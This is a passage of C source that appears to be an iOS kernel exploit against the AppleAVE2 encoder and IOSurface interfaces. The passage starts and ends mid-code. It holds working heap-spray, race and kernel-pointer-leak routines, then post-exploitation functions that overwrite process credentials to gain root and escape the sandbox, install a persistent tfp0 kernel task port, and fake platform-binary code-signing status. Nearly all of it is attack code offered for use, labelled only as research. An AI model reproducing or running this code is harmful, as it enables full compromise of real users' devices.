spray_id){\n // kalloc.48\n size_t spray_entity_size = TT1_holes_count * 112;\n TT1_seria_data_totalLen = spray_entity_size + 20 + 8; // 20/8 is head/tail for seriadata format\n TT1_seria_data_head = calloc(1, TT1_seria_data_totalLen);\n TT1_spraydata = (uint64_t *)(((char*)TT1_seria_data_head) + 20);\n TT1_seria_data_tail = (uint32_t *)(((char*)TT1_seria_data_head) + spray_entity_size + 20);\n \n memset(TT1_spraydata, 0x77, spray_entity_size);\n \n TT1_seria_data_head[0] = spray_id;\n TT1_seria_data_head[1] = 0;\n TT1_seria_data_head[2] = kOSSerializeMagic;\n TT1_seria_data_head[3] = kOSSerializeEndCollection | kOSSerializeArray | 2;\n TT1_seria_data_head[4] = kOSSerializeData | (uint32_t)spray_entity_size;\n \n TT1_seria_data_tail[0] = kOSSerializeEndCollection | kOSSerializeString | 2;\n TT1_seria_data_tail[1] = 0x1;\n}\n\nuint32_t TT1_sprayid = 0xB201;\nvoid TT1_send_spray(){\n \n size_t output_stru_size = 4;\n uint32_t output_stru = 0;\n \n TT1_sprayid = TT1_sprayid + 1;\n \n // Start spraying\n for(int i=TT1_sprayid; i<(TT1_sprayid+1); i++){\n TT1_seria_data_tail[1] = i;\n if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n continue;\n \n // IOSurfaceRootUserClient_sSetValue\n IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT1_seria_data_head, TT1_seria_data_totalLen, &output_stru, &output_stru_size);\n }\n}\n\nsize_t TT2_seria_data_totalLen = 0;\nuint32_t *TT2_seria_data_head = NULL;\nchar *TT2_spraydata = NULL;\nuint32_t *TT2_seria_data_tail = NULL;\n\nvoid Init_spraydata_for_TT2(uint32_t spray_id){\n // kalloc.48\n size_t spray_entity_size = 112;\n TT2_seria_data_totalLen = spray_entity_size + 20 + 8; // 20/8 is head/tail for seriadata format\n TT2_seria_data_head = calloc(1, TT2_seria_data_totalLen);\n TT2_spraydata = (((char*)TT2_seria_data_head) + 20);\n TT2_seria_data_tail = (uint32_t *)(((char*)TT2_seria_data_head) + spray_entity_size + 20);\n \n memset(TT2_spraydata, 0x66, spray_entity_size);\n \n TT2_seria_data_head[0] = spray_id;\n TT2_seria_data_head[1] = 0;\n TT2_seria_data_head[2] = kOSSerializeMagic;\n TT2_seria_data_head[3] = kOSSerializeEndCollection | kOSSerializeArray | 2;\n TT2_seria_data_head[4] = kOSSerializeData | (uint32_t)spray_entity_size;\n \n TT2_seria_data_tail[0] = kOSSerializeEndCollection | kOSSerializeString | 2;\n TT2_seria_data_tail[1] = 0x1;\n}\n\nvoid TT2_send_spray(){\n \n size_t output_stru_size = 4;\n uint32_t output_stru = 0;\n \n // Start spraying\n for(int i=0xD205; i<0xDC00; i++){\n *(uint32_t*)(TT2_spraydata + 0x18) = i;\n TT2_seria_data_tail[1] = i;\n if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n continue;\n \n // IOSurfaceRootUserClient_sSetValue\n IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT2_seria_data_head, TT2_seria_data_totalLen, &output_stru, &output_stru_size);\n }\n}\n\nvoid TT2_send_spray_smallspray(){\n \n size_t output_stru_size = 4;\n uint32_t output_stru = 0;\n \n // Start spraying\n for(int i=0xDC01; i<0xDD00; i++){\n *(uint32_t*)(TT2_spraydata + 0x18) = i;\n TT2_seria_data_tail[1] = i;\n if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n continue;\n \n // IOSurfaceRootUserClient_sSetValue\n IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT2_seria_data_head, TT2_seria_data_totalLen, &output_stru, &output_stru_size);\n }\n}\n\nvoid TT2_release_all(){\n \n for(int i=0xD205; i<0xDD00; i++){\n if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n continue;\n \n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, i);\n }\n}\n\nuint8_t add_new_client(){\n size_t input_stru_size = 0x8;\n uint64_t input_stru = 0;\n size_t output_stru_size = 0x8;\n uint32_t output_stru[2] = {0}; // Contain clientbuf->UniqueClientID\n int kr = IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 0, &input_stru, input_stru_size, output_stru, &output_stru_size);\n // For: AVE ERROR: FindUserClientInfo EnqueueGated failed\n printf(\" AVE AddClient kr: 0x%x(%d) clientid:0x%x|0x%x\\n\", kr, kr, output_stru[0], output_stru[1]);\n if(kr){\n printf(\"client full\\n\");\n return 1;\n }\n return 0;\n}\n\nvoid remove_client(){\n size_t input_stru_size = 0x4;\n uint32_t unused1 = 0;\n size_t output_stru_size = 0x4;\n uint32_t unused2 = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 1, &unused1, input_stru_size, &unused2, &output_stru_size);\n // Neither output_stru or kr has used for indicates any sign of success or failure\n}\n\nvoid encode_client_normal(uint8_t isFor_finalCleaning){\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n \n *(uint8_t*)(inputmap_InitInfo + 13377) = 0;\n if(isFor_finalCleaning)\n *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n else\n *(uint32_t*)(inputmap_InitInfo + 4) = 0x333;\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 2;\n \n {\n char *input_stru = calloc(1, 0x110);\n *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n }\n}\n\n\nvoid encode_client_normal222(){\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n \n *(uint8_t*)(inputmap_InitInfo + 13377) = 0;\n *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 2;\n \n {\n char *input_stru = calloc(1, 0x110);\n *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n \n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n }\n}\n\nvoid spray_client(){\n \n *(uint64_t*)(inputmap_InitInfo + 1072) = 0;\n \n pthread_t p3 = NULL;\n pthread_create(&p3, &pth_commAttr, (void*)race_kmem2, NULL);\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 2020) = 0xB0F0-31;\n *(uint32_t*)(inputmap_InitInfo + 2024) = 0x990-31;\n *(uint32_t*)(inputmap_InitInfo + 4) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4567;\n *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n \n *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n *(uint32_t*)(inputmap_InitInfo + 96) = 39;\n *(uint32_t*)(inputmap_InitInfo + 1936) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 13292) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13388) = 5;\n \n char input_stru[0x110] = {0};\n *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId; // FrameQueue\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId; // InitInfo\n \n *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId; // ParameterSetsBuffer\n \n *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId; // mbComplexityMapBuffer\n \n *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId; // statsMapBuffer[0]\n *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId; // statsMapBuffer[1]\n *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId; // statsMapBuffer[2]\n *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId; // statsMapBuffer[3]\n *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId; // statsMapBuffer[4]\n \n *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId; // codedOutputBuffer[0]\n *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId; // codedOutputBuffer[1]\n *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId; // codedOutputBuffer[2]\n *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId; // codedOutputBuffer[3]\n *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId; // codedOutputBuffer[4]\n \n *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId; // xCodeOutputBuffer[0]\n *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId; // xCodeOutputBuffer[1]\n \n *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId; // codedHeaderBuffer [0] *Must Specify\n *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId; // codedHeaderBuffer [1] *Must Specify\n *(uint32_t*)(input_stru + 220) = InitInfo_surfaceId; // codedHeaderBuffer [2]\n *(uint32_t*)(input_stru + 224) = InitInfo_surfaceId; // codedHeaderBuffer [3]\n *(uint32_t*)(input_stru + 228) = InitInfo_surfaceId; // codedHeaderBuffer [4]\n \n *(uint32_t*)(input_stru + 232) = InitInfo_surfaceId; // sliceHeaderBuffer[0]\n *(uint32_t*)(input_stru + 236) = InitInfo_surfaceId; // sliceHeaderBuffer[1]\n *(uint32_t*)(input_stru + 240) = InitInfo_surfaceId; // sliceHeaderBuffer[2]\n *(uint32_t*)(input_stru + 244) = InitInfo_surfaceId; // sliceHeaderBuffer[3]\n *(uint32_t*)(input_stru + 248) = InitInfo_surfaceId; // sliceHeaderBuffer[4]\n \n *(uint32_t*)(input_stru + 48) = InitInfo_surfaceId; // userDPBBuffer[0][0] ioSurface\n *(uint32_t*)(input_stru + 52) = InitInfo_surfaceId; // userDPBBuffer[0][1] ioSurface\n *(uint32_t*)(input_stru + 56) = InitInfo_surfaceId; // userDPBBuffer[1][0] ioSurface\n *(uint32_t*)(input_stru + 60) = InitInfo_surfaceId; // userDPBBuffer[1][1] ioSurface\n *(uint32_t*)(input_stru + 64) = InitInfo_surfaceId; // userDPBBuffer[2][0] ioSurface\n *(uint32_t*)(input_stru + 68) = InitInfo_surfaceId; // userDPBBuffer[2][1] ioSurface\n *(uint32_t*)(input_stru + 72) = InitInfo_surfaceId; // userDPBBuffer[3][0] ioSurface\n *(uint32_t*)(input_stru + 76) = InitInfo_surfaceId; // userDPBBuffer[3][1] ioSurface\n *(uint32_t*)(input_stru + 80) = InitInfo_surfaceId; // userDPBBuffer[4][0] ioSurface\n *(uint32_t*)(input_stru + 84) = InitInfo_surfaceId; // userDPBBuffer[4][1] ioSurface\n *(uint32_t*)(input_stru + 88) = InitInfo_surfaceId; // userDPBBuffer[5][0] ioSurface\n *(uint32_t*)(input_stru + 92) = InitInfo_surfaceId; // userDPBBuffer[5][1] ioSurface\n *(uint32_t*)(input_stru + 96) = InitInfo_surfaceId; // userDPBBuffer[6][0] ioSurface\n *(uint32_t*)(input_stru + 100) = InitInfo_surfaceId; // userDPBBuffer[6][1] ioSurface\n *(uint32_t*)(input_stru + 104) = InitInfo_surfaceId; // userDPBBuffer[7][0] ioSurface\n *(uint32_t*)(input_stru + 108) = InitInfo_surfaceId; // userDPBBuffer[7][1] ioSurface\n *(uint32_t*)(input_stru + 112) = InitInfo_surfaceId; // userDPBBuffer[8][0] ioSurface\n *(uint32_t*)(input_stru + 116) = InitInfo_surfaceId; // userDPBBuffer[8][1] ioSurface\n *(uint32_t*)(input_stru + 120) = InitInfo_surfaceId; // userDPBBuffer[9][0] ioSurface\n *(uint32_t*)(input_stru + 124) = InitInfo_surfaceId; // userDPBBuffer[9][1] ioSurface\n *(uint32_t*)(input_stru + 128) = InitInfo_surfaceId; // userDPBBuffer[10][0] ioSurface\n *(uint32_t*)(input_stru + 132) = InitInfo_surfaceId; // userDPBBuffer[10][1] ioSurface\n *(uint32_t*)(input_stru + 136) = InitInfo_surfaceId; // userDPBBuffer[11][0] ioSurface\n *(uint32_t*)(input_stru + 140) = InitInfo_surfaceId; // userDPBBuffer[11][1] ioSurface\n *(uint32_t*)(input_stru + 144) = InitInfo_surfaceId; // userDPBBuffer[12][0] ioSurface\n *(uint32_t*)(input_stru + 148) = InitInfo_surfaceId; // userDPBBuffer[12][1] ioSurface\n *(uint32_t*)(input_stru + 152) = InitInfo_surfaceId; // userDPBBuffer[13][0] ioSurface\n *(uint32_t*)(input_stru + 156) = InitInfo_surfaceId; // userDPBBuffer[13][1] ioSurface\n *(uint32_t*)(input_stru + 160) = InitInfo_surfaceId; // userDPBBuffer[14][0] ioSurface\n *(uint32_t*)(input_stru + 164) = InitInfo_surfaceId; // userDPBBuffer[14][1] ioSurface\n *(uint32_t*)(input_stru + 168) = InitInfo_surfaceId; // userDPBBuffer[15][0] ioSurface\n *(uint32_t*)(input_stru + 172) = InitInfo_surfaceId; // userDPBBuffer[15][1] ioSurface\n *(uint32_t*)(input_stru + 176) = InitInfo_surfaceId; // userDPBBuffer[16][0] ioSurface\n *(uint32_t*)(input_stru + 180) = InitInfo_surfaceId; // userDPBBuffer[16][1] ioSurface\n \n *(uint8_t*)(input_stru + 256) = 1;\n *(uint64_t*)(input_stru + 264) = 0x2222222222222222;\n \n size_t output_stru_size = 4;\n char output_stru[4] = {0};\n \n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n}\n\nuint8_t check_if_valid_kernel_ptr(uint64_t target_ptr){\n if(((target_ptr >> 32) & 0xFFFFFFF0) == 0xFFFFFFF0)\n return 1;\n return 0;\n}\n\nuint64_t find_proc_byPID(pid_t target_pid) {\n \n uint64_t found_proc = KernelRead_8bytes(HARDCODED_allproc + kaslr);\n while(1){\n // this loop start from the most recent new proc\n if(!found_proc)\n break;\n \n pid_t pid_i = KernelRead_4bytes(found_proc + OFFSET_bsd_info_pid);\n \n if(target_pid == pid_i)\n break;\n \n found_proc = KernelRead_8bytes(found_proc);\n }\n return found_proc;\n}\n\n#define PROC_ALL_PIDS 1\nextern int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize);\nextern int proc_pidpath(int pid, void * buffer, uint32_t buffersize);\n\npid_t look_for_proc(char *proc_name){\n \n pid_t *pids = calloc(1, 3000 * sizeof(pid_t));\n int procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, 3000);\n if(procs_cnt > 3000){\n pids = realloc(pids, procs_cnt * sizeof(pid_t));\n procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, procs_cnt);\n }\n char pathBuffer[4096];\n for (int i=(procs_cnt-1); i>=0; i--) {\n if(pids[i] == 0){continue;}\n \n bzero(pathBuffer, 4096);\n if(proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer))){\n //printf(\" pid(%d): %s\\n\", pids[i], pathBuffer);\n if(!strcmp(proc_name, pathBuffer)){\n free(pids);\n return pids[i];\n }\n }\n }\n free(pids);\n return 0;\n}\n\nchar *string_get_basename(const char *str) {\n char *base = strrchr(str, '/');\n return base ? base+1 : str;\n}\n\npid_t look_for_proc_basename(char *proc_name){\n pid_t *pids = calloc(1, 3000 * sizeof(pid_t));\n int procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, 3000);\n if(procs_cnt > 3000){\n pids = realloc(pids, procs_cnt * sizeof(pid_t));\n procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, procs_cnt);\n }\n char pathBuffer[4096];\n for (int i=(procs_cnt-1); i>=0; i--) {\n if(pids[i] == 0){continue;}\n bzero(pathBuffer, 4096);\n if(proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer))){\n \n extern char *string_get_basename(const char *str);\n char *ww = string_get_basename(pathBuffer);\n \n if(!strcmp(proc_name, ww)){\n free(pids);\n return pids[i];\n }\n }\n }\n free(pids);\n return 0;\n}\n\nstruct paveway_sprayAddrs_pack{\n uint64_t *paveway_sprayAddrs;\n uint32_t paveway_sprayCnt;\n};\nstruct paveway_sprayAddrs_pack *_pack_paveway = 0;\nuint32_t _pack_pavewayCnt = 0;\n\nuint64_t hohoo(){\n // LGB at Texas Instrument!\n uint64_t conti_seqno[2] = {0};\n uint64_t *paveway_sprayAddrs = calloc(1, 300 * 8); // 300 is default storage unit count of paveway_sprayAddrs\n uint32_t paveway_sprayCnt = 0;\n while(1){\n uint64_t new_addr = alloc_kernel_40_mem();\n paveway_sprayAddrs[paveway_sprayCnt] = new_addr;\n paveway_sprayCnt ++;\n \n for(int j=0; j criticle_index){\n if(leaked_osdata && leaked_osdata == live_40buf){\n // Target address been taken again, indicating was failure attempt, leaked_osdata is a false result\n (printf)(\"**** 0x%llx Target address been taken again, indicating that was failure attempt.. reattemping...\\n\", live_40buf);\n leaked_osdata = 0;\n i = 0;\n }\n }\n \n (printf)(\"spraymap: 0x%llx\\n\", live_40buf);\n release_kernel_40_mem(live_40buf);\n }\n \n return leaked_osdata;\n}\n\nuint32_t TT1_hit_holes[TT1_holes_count] = {0};\nuint32_t TT1_hit_cnt = 0;\n\nvoid hohoo222(){\n bzero(TT1_hit_holes, sizeof(TT1_hit_holes));\n TT1_hit_cnt = 0;\n \n uint64_t leaked_osdata = 0;\n while(1){\n leaked_osdata = hohoo();\n if(leaked_osdata)\n break;\n }\n \n TT2_send_spray();\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD701);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD751);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD7A1);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD7F1);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD841);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD891);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD8E1);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD931);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD9D1);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDA21);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDA71);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDAC1);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDB11);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDB61);\n IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDBB1);\n \n \n *(uint64_t*)(inputmap_InitInfo + 5936) = leaked_osdata + 0x18;\n alloc_kernel_40_mem_contains_iosurfacebuf();\n empty_kernel_40_mem(leaked_osdata + 0x20);\n \n uint32_t confirm_TT1_sprayid = 0;\n uint8_t failure_case_all7 = 0;\n char *ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid);\n ccc = ccc + 0x10;\n confirm_TT1_sprayid = TT1_sprayid;\n for(int i=0; ienable_switch_one_SetSessionSettings // always 0\n *(forge_clientbuf + 0x27B59) = 0x1;\n}\n\n\n\n#pragma mark ---- Research Purpose ---- Basic for post-exp\n\nextern char *Build_resource_path(char *filename);\nextern int runCommand(const char *cmd, ...);\nextern int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t));\n#define copyfile(X,Y) (copyfile)(X, Y, 0, COPYFILE_ALL|COPYFILE_RECURSIVE|COPYFILE_NOFOLLOW_SRC);\n\nvoid run_post_exp(){\n \n extern void safepatch_swap_unsandbox_and_root(uint64_t target_proc);\n extern void safepatch_unswap_unsandbox_and_root(uint64_t target_proc);\n \n // TODO with TFP0\n \n safepatch_swap_unsandbox_and_root(our_proc_kAddr);\n (printf)(\"now uid: %d\\n\", getuid());\n \n extern void build_tfp0_persistence_for_research_purpose(void);\n build_tfp0_persistence_for_research_purpose();\n extern void patch_codesign(void);\n safepatch_unswap_unsandbox_and_root(our_proc_kAddr);\n \n}\n\n#pragma mark ---- Research Purpose ---- Install tfp0-persis program\n\nuint32_t OFFSET_bsd_info_p_ucred = 0x100;\nuint32_t OFFSET_task_bsd_info = 0; // auto-gen: task->bsd_info\n\nuint64_t KernelLeak_portAddr(uint64_t target_task, uint32_t portname){\n // Leak kernel ipc port stru address of the input port\n \n uint64_t leaked_port_stru_kAddr = 0;\n \n mach_port_t stored_ports[3] = {0};\n stored_ports[0] = mach_task_self();\n stored_ports[2] = portname;\n mach_ports_register(mach_task_self(), stored_ports, 3);\n \n leaked_port_stru_kAddr = KernelRead_8bytes(target_task + OFFSET_task_itk_registered + 0x10);\n \n stored_ports[2] = 0;\n mach_ports_register(mach_task_self(), stored_ports, 3);\n \n return leaked_port_stru_kAddr;\n}\n\nuint32_t KernelLeak_portAddr2(uint64_t target_task, uint64_t portStru){\n // Leak kernel ipc port stru address of the input port\n \n mach_port_t *stored_ports = NULL;\n mach_msg_type_number_t stored_portsCnt = 3;\n \n KernelWrite_8bytes(target_task + OFFSET_task_itk_registered + 0x10, portStru);\n \n mach_ports_lookup(mach_task_self(), &stored_ports, &stored_portsCnt);\n uint32_t rt_p = stored_ports[2];\n vm_deallocate(mach_task_self(), (vm_address_t)stored_ports, 4 * stored_portsCnt);\n return rt_p;\n}\n\nvoid patch_install_tfp0(uint64_t target_task, uint64_t safe_tfp0){\n KernelWrite_8bytes(target_task + OFFSET_task_itk_task_access, safe_tfp0);\n}\n\nvoid patch_remove_tfp0(uint64_t target_task){\n KernelWrite_8bytes(target_task + OFFSET_task_itk_task_access, 0);\n}\n\nmach_port_t patch_retrieve_tfp0(){\n tfp0_port = 0;\n task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port); // TASK_ACCESS_PORT is 8 in ios13 (for non-PAC), for PAC is 9\n return tfp0_port;\n}\n\nvoid patch_TF_PLATFORM(uint64_t target_task){\n uint32_t old_t_flags = KernelRead_4bytes(target_task + OFFSET_task_t_flags);\n old_t_flags |= 0x00000400; // TF_PLATFORM\n KernelWrite_4bytes(target_task + OFFSET_task_t_flags, old_t_flags);\n \n // used in kernel func: csproc_get_platform_binary\n}\n\nuint64_t ubc_cs_blob_get(uint64_t vp, int cputype, uint64_t offset){\n \n uint64_t uip = 0; // struct ubc_info *uip;\n uint64_t blob = 0;\n \n if ( vp && KernelRead_2bytes(vp + 112) == 1 && (uip = KernelRead_8bytes(vp + 120)) != 0 ){\n for (blob = KernelRead_8bytes(uip + 80); blob; blob = KernelRead_8bytes(blob)){\n if (cputype != -1 && KernelRead_4bytes(blob + 8) == cputype)\n break;\n if(offset != -1){\n uint64_t offset_in_blob = offset - KernelRead_8bytes(blob + 16);\n if(offset_in_blob >= KernelRead_8bytes(blob + 24) && offset_in_blob < KernelRead_8bytes(blob + 32))\n break;\n }\n }\n }\n \n return blob;\n}\n\nvoid patch_CS_PLATFORM_BINARY(uint64_t target_proc){\n uint64_t p_textvp = KernelRead_8bytes(target_proc + 568); // confirmed same offsets on pac\n if(!p_textvp)\n return;\n uint64_t p_textoff = KernelRead_8bytes(target_proc + 576);\n uint64_t csblob = ubc_cs_blob_get(p_textvp, -1, p_textoff);\n if(csblob){\n KernelWrite_1byte(csblob + 168, 1); // csblob->csb_platform_binary\n }\n}\n\nvoid patch_unsandbox_and_root(uint64_t target_proc, bool patch_root){\n \n uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n \n char *old_cred = calloc(1, 0x68);\n KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n \n uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n if(patch_root)\n bzero(old_cred, 0x68);\n \n (printf)(\"old_cr_label: 0x%llx\\n\", old_cr_label);\n if(old_cr_label){\n *(uint64_t*)(old_cred + 0x60) = old_cr_label;\n (printf)(\"old_cr_label+0: 0x%llx\\n\", KernelRead_8bytes(old_cr_label));\n (printf)(\"old_cr_label+0x8: 0x%llx\\n\", KernelRead_8bytes(old_cr_label + 0x8));\n (printf)(\"old_cr_label+0x10: 0x%llx\\n\", KernelRead_8bytes(old_cr_label + 0x10));\n KernelWrite_8bytes(old_cr_label+0x10, 0x0);\n }\n \n KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n free(old_cred);\n}\n\nchar *old_cred = NULL;\nuint64_t old_cr_label_content = 0;\nvoid safepatch_swap_unsandbox_and_root(uint64_t target_proc){\n \n uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n \n if(!old_cred){\n old_cred = calloc(1, 0x68);\n }\n KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n char *tmp_cred = calloc(1, 0x68);\n memcpy(tmp_cred, old_cred, 0x68);\n \n uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n bzero(tmp_cred, 0x68);\n \n if(old_cr_label){\n *(uint64_t*)(tmp_cred + 0x60) = old_cr_label;\n old_cr_label_content = KernelRead_8bytes(old_cr_label+0x10);\n KernelWrite_8bytes(old_cr_label+0x10, 0x0);\n }\n \n KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, tmp_cred, 0x68);\n free(tmp_cred);\n}\n\nvoid safepatch_unswap_unsandbox_and_root(uint64_t target_proc){\n \n uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n \n KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n \n uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n if(old_cr_label){\n KernelWrite_8bytes(old_cr_label+0x10, old_cr_label_content);\n }\n}\n\nuint64_t myold_cred = 0;\nvoid safepatch_swap_kernel_cred(uint64_t target_proc){\n \n uint64_t kernel_proc = find_proc_byPID(0);\n uint64_t kernel_p_ucred = KernelRead_8bytes(kernel_proc + OFFSET_bsd_info_p_ucred);\n \n myold_cred = KernelRead_8bytes(target_proc + 